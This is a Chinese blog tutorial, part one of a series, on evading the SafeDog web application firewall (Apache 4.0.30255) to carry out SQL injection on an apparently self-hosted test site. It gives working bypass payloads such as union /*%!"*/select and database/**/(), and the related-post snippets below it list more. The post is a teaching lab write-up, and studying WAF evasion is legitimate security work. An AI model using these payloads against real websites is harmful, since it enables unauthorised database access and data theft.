绕过安全狗(Apache 4.0.30255)——SQL注入(上)

最新推荐文章于 2023-02-09 21:45:51 发布
最新推荐文章于 2023-02-09 21:45:51 发布
阅读量1k 收藏 1
点赞数
文章标签: sql apache 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51330619/article/details/120357032
版权

先给网站装上安全狗(Apache 4.0.30255)
在这里插入图片描述

首先测试是否是注入点
在这里插入图片描述
这里应该是and被过滤了
在这里插入图片描述
尝试用大小写与双写都不行,想想也是,安全狗也没那么笨
然后尝试用&&代替and
在这里插入图片描述
在这里插入图片描述
于是乎就成功判断出注入点咯,接下来order by判断列数

1'  order by 3#

在这里插入图片描述
判断为2列,union联合注入查询咯

1' union select 1,2#

在这里插入图片描述
在这里插入图片描述
被拦截了奥,现在需要找到是什么函数被拦截了

1' union #            不拦截
1' select 1,2#       不拦截
1' union z select 1,2#  不拦截
1' union select 1,2#     拦截

可以发现只有当union与select连在一起出现时才会拦截,所以可以考虑通过注释符来干扰安全狗的识别

1' union/**/select 1,2#            拦截
尝试一下内联注入
1'/*!union*/select 1,2#            拦截
1'/*!union/*!/**//*!select*/1,2#   拦截
尝试一下在注释符中插入特殊符号 
1' union /*%!"*/select 1,2#      不拦截

在这里插入图片描述
可以愉快地注入了,在本次注入中有遇到相连函数拦截的就可以用/%!"/ 来绕过。
查看一下用的什么数据库,

1' union /*%!"*/select  /*%!"*/1,database()#  拦截

应该是database()被拦截了,试试注释符拆分他

1' union /*%!"*/select  /*%!"*/1,database/**/()#  不拦截

在这里插入图片描述
成功注入得到数据库名了,咱先告一段落,剩下的下期再讲。

成了鱼粉xixi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安全狗4.0.30255)最新版sql注入 bypass
weixin_48170459的博客
08-27 175
唉,fuzz了好久才fuzz出来的 写个记录 安全狗版本 测试平台:dvwa 常规注入 1’ and ‘1’='1,直接被拦截 将空格替换成/*//*/–%0e%0a即可绕过,函数绕过,如database()可换成database/*//*/–%0e%0a()绕过 判断注入点 错误条件无内容显示 判断字段 联合表查询 ...
SQL注入绕过安全狗
blackguest07的博客
01-12 2179
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 4958
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
SQL注入 安全狗绕过
iO快到碗里来
09-24 364
0x00 前言 最近看了几篇关于安全狗 Bypass 的文章,绕过方式五花八门。在此以安全狗 apache4.0.30255 为例,简单做个总结。 0x01 相关知识 /* … */ 在大部分语言中都是一种注释,处于 /* … */ 之中的语句是不被执行的。但 MySQL 为了保证兼容性,比如要求从 mysqldump 导出的 SQL 语句能被其它数据库直接使用,它把一些特有的仅在 MySQL 上能执行的语句放在 /*! … */ 中,这样这些语句在其它数据库中就不会被当作执行语句,但在 MySQL
安全狗SQL注入绕过
qq_38675102的博客
02-09 2292
安全狗waf绕过
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
08-03
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
网站安全狗Apache版 v4.0.16672
01-02
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖网马/木马扫描、防SQL注入、防盗链、防黑链、防CC攻击、下载线程保护、IP黑白名单管理等功能,新版本增加了界面...
网站安全狗Apache版 v4.0.17181
12-01
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖网马/木马扫描、防SQL注入、防盗链、防黑链、防CC攻击、下载线程保护、IP黑白名单管理等功能,新版本增加了界面...
网站安全狗Apache版 v4.0.18089
10-30
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖网马/木马扫描、防SQL注入、防盗链、防黑链、防CC攻击、下载线程...7、修复最新SQL注入绕过漏洞;网站安全狗Windows-
apache-jmeter-4.0.zip
07-31
Apache JMeter™应用程序是开放源码软件, 一个100% 纯 Java 应用程序, 旨在加载测试功能行为和测量性能。它最初设计用于测试 Web 应用程序, 但后来扩展到其他测试功能。它可以用于对服务器、网络或对象模拟繁重的...
sql注入绕狗
MSB_WLAQ的博客
09-30 363
安全狗总结 安全狗靶场 http://59.63.200.79:8014/?id=1 在绕过之前,我需要说明我的注入方法简化说明。 一个注入点我分为六个步骤去完成注入操作: 一、判断是否存在注入 二、当前页面有几个字段,是否有回显 三、利用回显点,遍历表名 四、利用表名,遍历字典 五、输出数据 安全狗绕过 判断是否存在注入 一般来说都是判断and 1=1(2)来判断有无注入点 发现有狗狗 这时就要判断狗狗是咬住了哪个词 发现是and于是我在这理讲讲..
mysql特性绕过安全狗_绕过安全狗新版进行SQL注入
weixin_39641738的博客
02-28 185
前言在圈子见到某师傅过了安全狗然后注入,然后自己手痒也搭了个环境进行测试。期间搭建环境各种坑….不过后面还是有个不错的结果的正文首先我是用phpstudy+安全狗4.0搭建的环境一开始找不到apache名称,按照网上的来整也不行(一堆重复的沙雕)解决方法:以管理员权限运行cmd,进入apache/bin目录httpd -k install -n apache2.4以管理员权限运行cmd,进入mys...
sql注入安全狗(官网绕waf)【原创】
weixin_30237281的博客
03-26 451
作者:风之传说 给大家来个全新的过狗的语句。拿官方网站做测试。 众所周知,waf过select , 过 union ,过 from 是最难的。首先我们来看看官网: 来看看基础的and 1=1: 再来个联合查询 union select 1,2,3 可以看到,都会被拦截。由于此文不是装逼文,我们就不讲如何一步步进行突破了。我直接给出语句吧:%''union+/*!50000%53...
网站安全狗V4.0绕过姿势
干铮的博客
09-27 3836
网站安全狗下载地址: 网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改https://www.safedog.cn/website_safedog.html DVWA下载: 链接:https://pan.baidu.com/s/1XZXC3r_LhtY9s7xJM_NAYQ 提取码:kun6 --来自百度网盘超级会员V3的分享 已DVWA SQL注入为例对网站安全狗进行绕过测试。 1.查看安全狗防御规则匹配库。 2.绕过分析 字符 ...
SQL注入绕过安全狗的五种方法
01-11 1241
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
最新安全狗 apache v4.0 sql注入 bypass
weixin_30417487的博客
12-30 318
前言 最近没事学习一下 waf 的 bypass , 本文介绍下 bypass 安全狗的笔记。个人感觉 bypass 的总思路(正则匹配型 waf)就是利用各种语法特性来逃避正则(当然要保证语法正确性的前提下) 测试环境: phpstudy + 安全狗Apache版 V4.0、 burp + hackvertor 插件 判断注入 判断字符型注入还是数字型 往数字后面加若干个字母,如果结果不变应该...
SQL注入-过安全狗apache4.0
m0_60716947的博客
05-15 933
目录 一、安全狗的安装 二、Fuzz 三、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-CSDN博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
SQL注入-安全狗apache最新版绕过
crowsec
01-26 1557
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01背景知识 现在的环境下对web选手越来越不友好,如果想在web场景中去挖洞,基本上都要面对waf,而常用的waf产品有很多,本次以开源免费最新版安全狗为例,绕过waf获取数据。 tips:本文需要您提前掌握一定的基础知识! 02环境配置 Windows10主机 phpstudy2018 sqli-labs靶场 安全狗apache4.0.30255 当前版本是最新版安全狗(截止2021.05.17) ...
安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 284
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
pom collections4-4.0.jar
最新发布
12-18
pom collections4-4.0.jar是Apache Commons Collections库的一个扩展库。Apache Commons Collections是一个开源的Java集合框架,提供了许多有用的集合类和算法,使Java集合操作更简单和高效。 该扩展库的版本为4.0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值